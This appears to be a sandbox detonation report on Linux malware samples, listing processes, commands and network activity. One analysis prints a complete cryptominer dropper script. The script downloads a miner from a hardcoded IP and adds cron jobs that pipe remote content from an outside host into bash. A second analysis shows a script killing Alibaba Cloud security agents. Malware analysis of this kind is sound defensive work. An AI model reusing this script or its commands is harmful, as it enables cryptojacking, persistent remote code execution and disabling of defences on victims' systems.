[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/cat

[cat /etc/crontab]

/usr/bin/grep

[grep -q secure]

/var/tmp/.xrx/xrx

[/var/tmp/.xrx/xrx]

/usr/bin/sleep

[sleep 1]

/usr/bin/pgrep

[pgrep xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:53

Platform

debian9-mipsel-20240611-en

Max time kernel

4s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:50

Platform

debian9-mipsel-20240611-en

Max time kernel

0s

Command Line

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Signatures

N/A

Processes

/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Network

N/A

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsbe-20240611-en

Max time kernel

144s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsel-20240418-en

Max time kernel

2s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/733/cmdline /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/713/cmdline /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/331/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/123/cmdline /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/157/stat /usr/bin/killall N/A
File opened for reading /proc/230/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/334/stat /usr/bin/killall N/A
File opened for reading /proc/707/cmdline /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/733/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/151/stat /usr/bin/killall N/A
File opened for reading /proc/748/stat /usr/bin/killall N/A
File opened for reading /proc/329/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/333/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/694/stat /usr/bin/killall N/A
File opened for reading /proc/171/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/707/cmdline /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/707/cmdline /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/731/stat /usr/bin/killall N/A
File opened for reading /proc/707/stat /usr/bin/killall N/A
File opened for reading /proc/432/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/123/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/671/stat /usr/bin/killall N/A
File opened for reading /proc/151/stat /usr/bin/killall N/A
File opened for reading /proc/730/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/678/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/713/cmdline /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/230/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/331/stat /usr/bin/killall N/A
File opened for reading /proc/713/cmdline /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/731/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/713/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A